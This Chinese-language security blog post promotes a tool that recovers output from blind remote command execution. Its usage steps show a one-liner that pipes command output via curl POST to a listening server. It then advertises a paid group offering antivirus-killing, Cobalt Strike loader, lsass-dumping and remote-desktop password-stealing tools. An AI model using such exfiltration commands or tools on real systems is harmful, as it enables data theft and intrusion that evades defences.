工具推荐 | RCE命令无回显利用工具

发布于 作者:

工具推荐 | RCE命令无回显利用工具

shanxi 星落安全团队 2025-05-22 16:00

点击上方
蓝字
关注我们

现在只对常读和星标的公众号才展示大图推送,建议大家能把
星落安全团队

设为星标
”,
否则可能就看不到了啦

工具介绍

RCE命令无回显利用工具,支持在Linux、Windows下使用,渗透测试中遇到执行命令无回显的场景时可以使用该工具通过curl外带命令达到回显的效果。

工具使用

  1. 服务端部
    署,执行以下命令: 
python3 app.py

2. 
客户端请求,
执行以下命令: 

pwd | curl -X POST -d @- http://127.0.0.1:5000/ 

3.访问服务端网页相关服务来查看客户端命令执行结果

相关地址

关注微信公众号后台回复“入群”,即可进入星落安全交流群!

关注微信公众号后台回复“20250523”,即可获取项目下载地址!

圈子介绍

博主介绍

目前工作在某安全公司攻防实验室,一线攻击队选手。自2022-2024年总计参加过30+次省/市级攻防演练,擅长工具开发、免杀、代码审计、信息收集、内网渗透等安全技术。

目前已经更新的免杀内容:
– 部分免杀项目源代码

  • 一键击溃360+核晶

  • 一键击溃windows defender

  • 一键击溃火绒进程

  • CobaltStrike4.9.1二开 

  • CobaltStrike免杀加载器

  • 数据库直连工具免杀版

  • aspx文件自动上线cobaltbrike

  • jsp文件
    自动上线cobaltbrike

  • 哥斯拉免杀工具 
    XlByPassGodzilla

  • 冰蝎免杀工具 XlByPassBehinder

  • 冰蝎星落专版 xlbehinder

  • 正向代理工具 xleoreg

  • 反向代理工具xlfrc

  • 内网扫描工具 xlscan

  • CS免杀加载器 xlbpcs

  • Todesk/向日葵密码读取工具

  • 导出lsass内存工具 xlrls

  • 绕过WAF免杀工具 ByPassWAF

  • 等等…

图片

目前星球已满500人,价格由208元
调整为
218元(
交个朋友啦
),600名以后涨价至268元!

图片

图片

往期推荐

1. 
学不会全额退款 | 星落免杀第一期,助你打造专属免杀武器库

2. 
【干货】你不得不学习的内网渗透手法

3. 
【免杀】CobaltStrike4.9.1二开 | 自破解 免杀 修复BUG

4. 
【免杀】原来SQL注入也可以绕过杀软执行shellcode上CoblatStrike

图片


声明
】本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统以及盈利等目的,一切后果由操作者自行承担!!!